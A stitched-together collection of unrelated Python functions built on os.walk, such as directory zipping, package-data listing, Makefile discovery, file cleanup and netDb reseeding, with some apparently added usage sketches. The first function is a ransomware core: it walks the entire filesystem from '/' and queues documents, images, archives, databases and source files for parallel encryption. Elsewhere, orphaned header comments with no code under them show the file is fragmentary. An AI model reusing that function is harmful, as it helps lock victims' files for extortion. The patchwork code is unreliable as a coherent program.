def select_files():
    # NOTE: the original list was missing a comma between ".wmv" and ".docx",
    # which silently concatenated them into one extension ".wmv.docx".
    ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
           ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
           ".rm", ".swf", ".vob", ".wmv", ".docx", ".pdf", ".rar",
           ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe",
           ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
           ".gif", ".txt", ".py", ".pyc", ".jar", ".sql", ".bundle",
           ".sqlite3", ".html", ".php", ".log", ".bak", ".deb"]
    files_to_enc = []
    for root, dirs, files in os.walk("/"):
        for file in files:
            if file.endswith(tuple(ext)):
                files_to_enc.append(os.path.join(root, file))
    # Parallelize execution of the encryption function over four subprocesses
    pool = Pool(processes=4)
    pool.map(single_arg_encrypt_file, files_to_enc)
def zipdir(archivename, basedir):
    '''Zip directory, from J.F. Sebastian http://stackoverflow.com/'''
    assert os.path.isdir(basedir)
    with closing(ZipFile(archivename, "w", ZIP_DEFLATED)) as z:
        for root, dirs, files in os.walk(basedir):
            # NOTE: ignore empty directories
            for fn in files:
                if fn[-4:] != '.zip':
                    absfn = os.path.join(root, fn)
                    zfn = absfn[len(basedir) + len(os.sep):]  # XXX: relative path
                    z.write(absfn, zfn)
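# A minimal usage sketch for zipdir() above; the imports and the "myproject"
# path are illustrative assumptions, not part of the original snippet:
import os
from contextlib import closing
from zipfile import ZipFile, ZIP_DEFLATED
zipdir("myproject.zip", "myproject")  # archives myproject/ into myproject.zip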
# ================ Inventory input data and create data structure =================
def zip_dir(directory):
    """zip a directory tree into a BytesIO object"""
    result = io.BytesIO()
    dlen = len(directory)
    with ZipFile(result, "w") as zf:
        for root, dirs, files in os.walk(directory):
            for name in files:
                full = os.path.join(root, name)
                rel = root[dlen:]
                dest = os.path.join(rel, name)
                zf.write(full, dest)
    return result
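# A minimal usage sketch for zip_dir(); the imports and the "data" directory
# are assumptions. The returned BytesIO holds a complete zip archive in memory:
import io, os
from zipfile import ZipFile
buf = zip_dir("data")
payload = buf.getvalue()  # raw zip bytes, e.g. for an HTTP response body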
#
# Simple progress bar
#
def load_data(self):
    # work in the parent of the pages directory, because we
    # want the filenames to begin "pages/...".
    chdir(dirname(self.setup.pages_dir))
    rel = relpath(self.setup.pages_dir)
    for root, dirs, files in walk(rel):
        for filename in files:
            start, ext = splitext(filename)
            if ext in self.setup.data_extensions:
                # yield root, dirs, filename
                loader = self.setup.data_loaders.get(ext)
                path = join(root, filename)
                if not loader:
                    raise SetupError("Identified data file '%s' by type '%s' but no loader found" % (filename, ext))
                data_key = join(root, start)
                loaded_dict = loader.loadf(path)
                self.data[data_key] = loaded_dict
                # self.setup.log.debug("data key [%s] ->" % (data_key,), root, filename); pprint.pprint(loaded_dict, sys.stdout)
    # pprint.pprint(self.data, sys.stdout)
    # print("XXXXX data:", self.data)
def prepare_zip():
    from pkg_resources import resource_filename as resource
    from config import config
    from json import dumps
    logger.info('creating/updating gimel.zip')
    with ZipFile('gimel.zip', 'w', ZIP_DEFLATED) as zipf:
        info = ZipInfo('config.json')
        # store Unix permission bits (0664) in the entry's external attributes
        info.external_attr = 0o664 << 16
        zipf.writestr(info, dumps(config))
        zipf.write(resource('gimel', 'config.py'), 'config.py')
        zipf.write(resource('gimel', 'gimel.py'), 'gimel.py')
        zipf.write(resource('gimel', 'logger.py'), 'logger.py')
        for root, dirs, files in os.walk(resource('gimel', 'vendor')):
            for file in files:
                real_file = os.path.join(root, file)
                relative_file = os.path.relpath(real_file,
                                                resource('gimel', ''))
                zipf.write(real_file, relative_file)
def zipdir(path, zipn):
    for root, dirs, files in os.walk(path):
        for file in files:
            zipn.write(os.path.join(root, file))
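# A minimal usage sketch for this zipdir() variant; the imports and paths are
# assumptions. The caller owns (and closes) the ZipFile handle:
import os, zipfile
with zipfile.ZipFile("tree.zip", "w", zipfile.ZIP_DEFLATED) as zipn:
    zipdir("some_directory", zipn)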
def gen_data_files(src_dir):
    """
    generates a list of files contained in the given directory (and its
    subdirectories) in the format required by the ``package_data`` parameter
    of the ``setuptools.setup`` function.

    Parameters
    ----------
    src_dir : str
        (relative) path to the directory structure containing the files to
        be included in the package distribution

    Returns
    -------
    fpaths : list(str)
        a list of file paths
    """
    fpaths = []
    base = os.path.dirname(src_dir)
    for root, dirs, files in os.walk(src_dir):
        for f in files:
            fpaths.append(os.path.relpath(os.path.join(root, f), base))
    return fpaths
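# A minimal usage sketch; the package name and data directory are hypothetical.
# With src_dir="mypkg/data", the returned paths are relative to "mypkg", which
# is what package_data expects:
from setuptools import setup
setup(
    name="mypkg",
    packages=["mypkg"],
    package_data={"mypkg": gen_data_files("mypkg/data")},
)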
def clearpyc(root, patterns='*', single_level=False, yield_folders=False):
    """
    root: the directory to walk
    patterns: semicolon-separated fnmatch patterns to match against
    single_level: only scan the top level of the directory
    yield_folders: also match and yield subdirectory names
    """
    patterns = patterns.split(';')
    for path, subdirs, files in os.walk(root):
        if yield_folders:
            files.extend(subdirs)
        files.sort()
        for name in files:
            for pattern in patterns:
                if fnmatch.fnmatch(name, pattern.strip()):  # does name match this pattern?
                    yield os.path.join(path, name)
                    break  # don't yield the same name once per matching pattern
        if single_level:
            break
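# A minimal usage sketch: delete stale bytecode files. The imports and the
# "build" path are assumptions:
import os, fnmatch
for pyc_path in clearpyc("build", patterns="*.pyc;*.pyo"):
    os.remove(pyc_path)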
def get_distribution_names(self):
    """
    Return all the distribution names known to this locator.
    """
    result = set()
    for root, dirs, files in os.walk(self.base_dir):
        for fn in files:
            if self.should_include(fn, root):
                fn = os.path.join(root, fn)
                url = urlunparse(('file', '',
                                  pathname2url(os.path.abspath(fn)),
                                  '', '', ''))
                info = self.convert_url_to_download_info(url, None)
                if info:
                    result.add(info['name'])
        if not self.recursive:
            break
    return result
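# This method matches distlib's DirectoryLocator; a usage sketch under that
# assumption (the wheelhouse path is hypothetical):
from distlib.locators import DirectoryLocator
locator = DirectoryLocator("/srv/wheelhouse", recursive=False)
print(locator.get_distribution_names())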
def test_pydist():
    """Make sure pydist.json exists and validates against our schema."""
    # XXX this test may need manual cleanup of older wheels
    import jsonschema

    def open_json(filename):
        with open(filename, 'rb') as f:
            return json.loads(f.read().decode('utf-8'))

    pymeta_schema = open_json(resource_filename('wheel.test',
                                                'pydist-schema.json'))
    valid = 0
    for dist in ("simple.dist", "complex-dist"):
        basedir = pkg_resources.resource_filename('wheel.test', dist)
        for (dirname, subdirs, filenames) in os.walk(basedir):
            for filename in filenames:
                if filename.endswith('.whl'):
                    whl = ZipFile(os.path.join(dirname, filename))
                    for entry in whl.infolist():
                        if entry.filename.endswith('/metadata.json'):
                            pymeta = json.loads(whl.read(entry).decode('utf-8'))
                            jsonschema.validate(pymeta, pymeta_schema)
                            valid += 1
    assert valid > 0, "No metadata.json found"
def get_all_pages(self):
    # work in the parent of the pages directory, because we
    # want the filenames to begin "pages/...".
    chdir(dirname(self.setup.pages_dir))
    rel = relpath(self.setup.pages_dir)
    for root, dirs, files in walk(rel):  # self.config.pages_dir
        # examples:
        #
        #   root='pages'            root='pages/categories'
        #   dirs=['categories']     dirs=[]
        #   files=['index.html']    files=['list.html']
        # self.setup.log.debug("\nTEMPLATE ROOT: %s" % root)
        # self.setup.log.debug("TEMPLATE DIRS: %s" % dirs)
        # self.setup.log.debug("TEMPLATE FILENAMES: %s" % files)
        # dir_context = global_context.new_child(data_tree[root])
        for filename in files:
            start, ext = splitext(filename)
            if ext in self.setup.template_extensions:
                # if filename.endswith(".html"):  # TODO: should this filter be required at all?
                yield Page(self.setup, filename, join(root, filename))
def unpack_directory(filename, extract_dir, progress_filter=default_filter):
    """"Unpack" a directory, using the same interface as for archives

    Raises ``UnrecognizedFormat`` if `filename` is not a directory
    """
    if not os.path.isdir(filename):
        raise UnrecognizedFormat("%s is not a directory" % filename)
    paths = {
        filename: ('', extract_dir),
    }
    for base, dirs, files in os.walk(filename):
        src, dst = paths[base]
        for d in dirs:
            paths[os.path.join(base, d)] = src + d + '/', os.path.join(dst, d)
        for f in files:
            target = os.path.join(dst, f)
            target = progress_filter(src + f, target)
            if not target:
                # skip non-files
                continue
            ensure_directory(target)
            f = os.path.join(base, f)
            shutil.copyfile(f, target)
            shutil.copystat(f, target)
def find_problems(problem_path):
    """
    Find all problems that exist under the given root.
    We consider any directory with a problem.json to be an intended problem directory.

    Args:
        problem_path: the root directory to search

    Returns:
        A list of directories that contain a problem.json.
    """
    problem_paths = []
    for root, _, files in os.walk(problem_path):
        if "problem.json" in files and "__staging" not in root:
            problem_paths.append(root)
    return problem_paths
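# A minimal usage sketch; the "./problems" root is hypothetical:
for problem_dir in find_problems("./problems"):
    print(problem_dir)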
def files_from_directory(directory, recurse=True, permissions=0o664):
    """
    Returns a list of File objects for every file in a directory. Can recurse optionally.

    Args:
        directory: The directory to add files from
        recurse: Whether or not to recursively add files. Defaults to true
        permissions: The default permissions for the files. Defaults to 0o664.
    """
    result = []
    for root, dirnames, filenames in os.walk(directory):
        for filename in filenames:
            result.append(File(join(root, filename), permissions))
        if not recurse:
            break
    return result
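# A minimal usage sketch; File is whatever class the surrounding project
# defines, and the "static" path is hypothetical:
static_files = files_from_directory("static", recurse=False)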
def get_unignored_file_paths(cls, ignore_list=None, white_list=None):
    config = cls.get_config()
    ignore_list = ignore_list or config[0]
    white_list = white_list or config[1]
    unignored_files = []
    for root, dirs, files in os.walk("."):
        logger.debug("Root:%s, Dirs:%s", root, dirs)
        if cls._ignore_path(unix_style_path(root), ignore_list, white_list):
            dirs[:] = []  # prune the walk: don't descend into an ignored directory
            logger.debug("Ignoring directory : %s", root)
            continue
        for file_name in files:
            file_path = unix_style_path(os.path.join(root, file_name))
            if cls._ignore_path(file_path, ignore_list, white_list):
                logger.debug("Ignoring file : %s", file_name)
                continue
            unignored_files.append(os.path.join(root, file_name))
    return unignored_files
def __processDir(self):
    """
    Looks for Makefiles in the given directory and all the sub-directories
    if recursive is set to true
    """
    self.__log("Processing directory %s" % self.__tgt)
    # if recursing, use walk; otherwise check the current directory only
    if self.__recurse:
        for (path, dirs, files) in os.walk(self.__tgt):
            for curr_file in files:
                # if the file is a Makefile, add it for processing
                if curr_file == __PATTERN__:
                    fname = os.path.join(path, curr_file)
                    self.__make_files.append(fname)
                    self.__log("Adding %s to list" % fname)
    else:
        # just look for Makefiles in this directory
        files = os.listdir(self.__tgt)
        if __PATTERN__ in files:
            fname = os.path.join(self.__tgt, __PATTERN__)
            self.__log("Appending %s to the list" % fname)
            self.__make_files.append(fname)
def get_sqls(self):
    """Extracts SQL statements from Java files containing MyBatis inline SQL.

    Returns:
        A list of :class:`SQL`. For example:

        [SQL('', u'select a.id, b.name from db.ac a join db.bc b on a.id=b.id or a.id=b.iid where a.cnt > 10')]
    """
    sqls = []
    for root, dirs, files in os.walk(self.dir):
        for file in files:
            if not file.endswith('.java'):
                continue
            with codecs.open(os.path.join(root, file), 'r', encoding=self.encoding) as f:
                sqls.extend(MybatisInlineSqlExtractor.get_selects_from_text(
                    MybatisInlineSqlExtractor.remove_comment(f.read())))
    return sqls
def refactor_dir(self, dir_name, write=False, doctests_only=False):
    """Descends down a directory and refactors every Python file found.

    Python files are assumed to have a .py extension.
    Files and subdirectories starting with '.' are skipped.
    """
    py_ext = os.extsep + "py"
    for dirpath, dirnames, filenames in os.walk(dir_name):
        self.log_debug("Descending into %s", dirpath)
        dirnames.sort()
        filenames.sort()
        for name in filenames:
            if (not name.startswith(".") and
                    os.path.splitext(name)[1] == py_ext):
                fullname = os.path.join(dirpath, name)
                self.refactor_file(fullname, write, doctests_only)
        # Modify dirnames in-place to remove subdirs with leading dots
        dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
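# This matches lib2to3's RefactoringTool.refactor_dir; a usage sketch under
# that assumption (the "src" path is hypothetical):
from lib2to3.refactor import RefactoringTool, get_fixers_from_package
tool = RefactoringTool(get_fixers_from_package("lib2to3.fixes"))
tool.refactor_dir("src", write=True)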
def remove_folder(self, folder):
    """Delete the named folder, which must be empty."""
    path = os.path.join(self._path, '.' + folder)
    for entry in os.listdir(os.path.join(path, 'new')) + \
                 os.listdir(os.path.join(path, 'cur')):
        if len(entry) < 1 or entry[0] != '.':
            raise NotEmptyError('Folder contains message(s): %s' % folder)
    for entry in os.listdir(path):
        if entry != 'new' and entry != 'cur' and entry != 'tmp' and \
           os.path.isdir(os.path.join(path, entry)):
            raise NotEmptyError("Folder contains subdirectory '%s': %s" %
                                (folder, entry))
    # walk bottom-up so files are removed before their parent directories
    for root, dirs, files in os.walk(path, topdown=False):
        for entry in files:
            os.remove(os.path.join(root, entry))
        for entry in dirs:
            os.rmdir(os.path.join(root, entry))
    os.rmdir(path)
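# This matches the standard library's mailbox.Maildir.remove_folder; a usage
# sketch under that assumption (the mailbox path and folder name are hypothetical):
import mailbox
md = mailbox.Maildir("/var/mail/me")
md.remove_folder("old-lists")  # raises mailbox.NotEmptyError if messages remain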
def find_media_files(media_path):
    unconverted = []
    for dirname, directories, files in os.walk(media_path):
        for file in files:
            # skip hidden files
            if file.startswith('.'):
                continue
            if is_video(file) or is_subtitle(file):
                file = os.path.join(dirname, file)
                # skip sample files (dots escaped so ".sample." matches literally)
                if re.search(r"\.sample\.", file, re.I):
                    continue
                unconverted.append(file)
    return sorted(unconverted)
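# A minimal usage sketch; is_video()/is_subtitle() come from the surrounding
# project, and the media path is hypothetical:
for media_file in find_media_files("/srv/media/incoming"):
    print(media_file)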
def get_latest_data_subdir(pattern=None, take=-1):
    def get_date(f):
        return os.stat(os.path.join(BASE_DATA_DIR, f)).st_mtime

    try:
        # next(os.walk(...)) yields (dirpath, dirnames, filenames) for the top level only
        dirs = next(os.walk(BASE_DATA_DIR))[1]
    except StopIteration:
        return None
    if pattern is not None:
        dirs = (d for d in dirs if pattern in d)
    dirs = list(sorted(dirs, key=get_date))
    if len(dirs) == 0:
        return None
    return dirs[take]
def garbage_collection():
    global garbage_count, garbage_list
    garbage_count = 0
    garbage_list = ''
    for root, dirs, targets in os.walk(media_path):
        for target_name in targets:
            if target_name.endswith(garbage):
                garbage_count += 1
                fullpath = os.path.normpath(os.path.join(str(root), str(target_name)))
                garbage_list = garbage_list + "\n" + (str(garbage_count) + ': ' + fullpath)
                os.remove(fullpath)
    if garbage_count == 0:
        print("\nGarbage Collection: There was no garbage found!")
    elif garbage_count == 1:
        print("\nGarbage Collection: The following file was deleted:")
    else:
        print("\nGarbage Collection: The following " + str(garbage_count) + " files were deleted:")
    print(garbage_list)
# Log various session statistics
def list_image(root, recursive, exts):
    i = 0
    if recursive:
        cat = {}
        for path, dirs, files in os.walk(root, followlinks=True):
            dirs.sort()
            files.sort()
            for fname in files:
                fpath = os.path.join(path, fname)
                suffix = os.path.splitext(fname)[1].lower()
                if os.path.isfile(fpath) and (suffix in exts):
                    if path not in cat:
                        cat[path] = len(cat)
                    yield (i, os.path.relpath(fpath, root), cat[path])
                    i += 1
        for k, v in sorted(cat.items(), key=lambda x: x[1]):
            print(os.path.relpath(k, root), v)
    else:
        for fname in sorted(os.listdir(root)):
            fpath = os.path.join(root, fname)
            suffix = os.path.splitext(fname)[1].lower()
            if os.path.isfile(fpath) and (suffix in exts):
                yield (i, os.path.relpath(fpath, root), 0)
                i += 1
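# A minimal usage sketch for the list_image() generator; the directory and
# extension list are hypothetical:
for idx, rel_path, label in list_image("images", True, [".jpg", ".png"]):
    print(idx, rel_path, label)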
def reseed(self, netdb):
    """Compress netdb entries and set content"""
    zip_file = io.BytesIO()
    dat_files = []
    for root, dirs, files in os.walk(netdb):
        for f in files:
            if f.endswith(".dat"):
                # TODO check modified time
                # may be not older than 10h
                dat_files.append(os.path.join(root, f))
    if len(dat_files) == 0:
        raise PyseederException("Can't get enough netDb entries")
    elif len(dat_files) > 75:
        dat_files = random.sample(dat_files, 75)
    with ZipFile(zip_file, "w", compression=ZIP_DEFLATED) as zf:
        for f in dat_files:
            zf.write(f, arcname=os.path.split(f)[1])
    self.FILE_TYPE = 0x00
    self.CONTENT_TYPE = 0x03
    self.CONTENT = zip_file.getvalue()
    self.CONTENT_LENGTH = len(self.CONTENT)
def QA_save_tdx_to_mongo(file_dir, client=QA_Setting.client):
    reader = TdxMinBarReader()
    __coll = client.quantaxis.stock_min_five
    for root, dirs, files in os.walk(file_dir):
        for file in files:
            if (str(file)[0:2] == 'sh' and int(str(file)[2]) == 6) or \
               (str(file)[0:2] == 'sz' and int(str(file)[2]) == 0) or \
               (str(file)[0:2] == 'sz' and int(str(file)[2]) == 3):
                QA_util_log_info('Now_saving ' + str(file)[2:8] + '\'s 5 min tick')
                # was a hard-coded Windows '\\' join; os.path.join is portable
                # and uses the walk's current directory, not just the top level
                fname = os.path.join(root, file)
                df = reader.get_df(fname)
                df['code'] = str(file)[2:8]
                df['market'] = str(file)[0:2]
                df['datetime'] = [str(x) for x in list(df.index)]
                df['date'] = [str(x)[0:10] for x in list(df.index)]
                df['time_stamp'] = df['datetime'].apply(
                    lambda x: QA_util_time_stamp(x))
                df['date_stamp'] = df['date'].apply(
                    lambda x: QA_util_date_stamp(x))
                data_json = json.loads(df.to_json(orient='records'))
                __coll.insert_many(data_json)
def create_zipfile(self, filename):
    zip_file = zipfile.ZipFile(filename, "w")
    try:
        self.mkpath(self.target_dir)  # just in case
        for root, dirs, files in os.walk(self.target_dir):
            if root == self.target_dir and not files:
                raise DistutilsOptionError(
                    "no files found in upload directory '%s'"
                    % self.target_dir)
            for name in files:
                full = os.path.join(root, name)
                relative = root[len(self.target_dir):].lstrip(os.path.sep)
                dest = os.path.join(relative, name)
                zip_file.write(full, dest)
    finally:
        zip_file.close()